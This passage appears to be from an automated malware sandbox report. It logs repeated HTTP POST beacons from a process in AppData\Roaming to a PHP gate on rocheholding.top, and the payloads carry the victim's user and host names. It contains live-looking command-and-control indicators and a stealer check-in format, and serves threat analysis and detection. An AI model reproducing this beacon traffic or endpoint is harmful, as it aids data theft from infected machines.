                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b6bea133344-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.2249173188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:46.332436085 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:46.383657932 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:47.055252075 CEST619INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWr2VtaSnYGrgzccJdFscUp8CgPkO80RhBa9SVqLKbu5QeSqsfZvBjTf34uqidUIi7cmqvr7%2FvqEh54A5T1i50Nz4EkoMmKm9QfFdSICRabFLnKplKxO1FYIk6TVogQvPyxI"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b732caf8c75-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.2249174188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:47.208604097 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:47.267741919 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:47.933002949 CEST617INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ESxxeqkVfXF4VXFtfwLi2yGgBWfCEiyib2cgHDr8xXO8VtKl00qeb3ZBqxMO2RHaO4NclNP5NID3Q4JDHIuWRVN1e7zwzn2Q1yOfNgkCEhTjSrKxedDjzz5grPDIuAG9FnU"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b789aaa1811-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.2249175188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:48.088332891 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:48.139667034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:48.808289051 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbO9%2Ff51En40xXUMJXBvaPx4ztxvOLbvO7aizt%2FvCWXp2CuRTdYI7dXwfMNF80ybpsblGGrOi%2FFltB5XK%2BsjMETTkcWse8IiY3cRz%2BVNOr6Zt2rFvjP3ce9Dkxwh2V8OJ6RP"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b7e2a2a8c9c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.2249176188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:49.147569895 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:49.199896097 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:49.905791998 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JPT0Eb6h3KGkRsCTJfPWXIV1ZBxIfevIfmMz4YfmdnuDoOIikL0wZXbpqOXoR9SkCF9vzInM%2FmKT8KIZYcwUppVfhuSX170ub%2F1Asm3UiK4J08BeoYx7wAgaPEh1Q7gCzm9"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b84e88bc46b-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.2249177188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:50.058542013 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:50.112425089 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:50.802231073 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NxQCk6kB3AkHfa9RbBk5OmGVIy1dF7b2Zl9nv2KMmKzs%2Fv0E3GG0A2TwyCyLZdxfxT%2FVfrtBoPT2rbRPgOOOfC8DCeLIkzHj3CbD%2FZZXzwPR6X94lgLv%2FopoRvcv%2FYhxtSiZ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b8a8f370cc4-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.2249178188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:50.944456100 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:50.995795965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:51.653791904 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXUAwumeRTn2EPKrghXM5f5O7yux9kh2yje9ZqNVBf38rZ%2Bnw%2FLLCDz9%2FPEHIAqjoFwh2Nqnz0hDhBg%2BA9E1zpC7d4qKWW9n3QsJNoFQid0JY75OR73Cg8t%2FFLfvJAJUXahH"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b8ffc4d19ef-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.2249179188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:51.806005955 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:51.855957031 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:52.548186064 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrsCRxFD5%2Fgb53p65mxpM9hR9vcfS5QBMX1jqIlj6v%2FxuX0JQt5HfQ1sO7wrUMeDp%2Fg80Tvclsx7wtncf5Z68%2Fz3qwCcuqV3qob573eHU4b%2BoB72VQSgQapy9EmuigNo4i7D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b956f041809-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.2249180188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:52.694695950 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:52.743721008 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:53.329623938 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0CgJEyqZwl4i4wdSfjRtsvTtAiSfF3Fm%2B%2BPJVE1lIJQwiZVTn73tzN8jYx46ar2Li8qoJNkbjOAcEbIx76TBq0%2FL4oKjdy1pTlVp3ZQtXTxHzRFnI5JnnZzUgiPVAkhYEP5F"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b9ae9fa0f75-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.2249181188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:54.073091984 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:54.123891115 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:54.813920021 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FrtQayU4gwdzKIPwrGCc12ylRHWr0U%2BxWSShGCqVDIAuH1T3W%2FMuPD24TwLRESkW1jSBl37KtAZQPHqera6xkMe83OAuBouFZj8DVBh%2BOYK%2Bj83vXbsNFtsk5yQK0X5v%2BbG"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870ba389a86a5c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.2249182188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:56.049433947 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:56.099731922 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:56.774432898 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUiuMWxHeAZto4vyQJFMuzlG9KIgQCvwDjE59ObOeJsuRbzwUppPmIUvGV36Cj2qb7Nk9OyGOJBBnvbC%2FYsNNjeXnD9gTP6AbN%2FWktDqN1Kls2iEFt2KeVN9GMs6o5xvzIr2"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bafdc730cc6-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.2249183188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:56.984951973 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:57.037854910 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:57.717241049 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nshdm7%2FxQ7I7mIXk6FeSTRrRBGzlUwPZPUDs3unZIhLlKWMw8EMXYgIcxnAqIVsdLu3ofslmE5Kzb6eqtmp8YQrEk0BS0oq7%2BAVFcCcI5LxMUE2fq%2FXhSNYEfjpE2tFyz5e6"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bb5deac41a9-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.2249184188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:57.920774937 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:57.972280979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:58.649785995 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOEhJ2CCk568%2FPu%2FPGGEqXry9Wim3RpQk7GbOrwVg6Aq9YkvFhh%2B1fZf4d0Amlw7WJBaU%2FyVTTglo6Tn6n4n0Dl4RTxgrniw%2FyY9%2FDrg1MPCnHJCFCdbj2xynDtpezBuHUg3"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bbb8d0c8c75-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.2249185188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:58.820260048 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:58.871562958 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:59.573703051 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBSJoX2Librrzm0a%2BUxlDhn6bQ%2B3By5BabGjqbo2XANPq80kju52e8bo4UmzWSGpk2ZbjtcenOqL9ZRbCaqOWptQOvHBMaZLc%2FfUW0JVR0obJwI6%2FXHo46D4qPCokXxIudAq"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bc16b2d7290-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.2249186188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:59.837093115 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:59.842195034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:00.570625067 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNgjoQuOUGnRL5nFO4bDamsFLzDEScp85oYd1S1gNj0qmG9Cji%2BMnRnvRC0Wt07TX6%2F%2FRqsOa9OfZGYuf3Pu1f4BQuImdUZTidXbh5DC3KvpkCQDGlwjwNkTdKxmVfm7Uk0k"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bc71e940c86-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.2249187188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:00.736741066 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
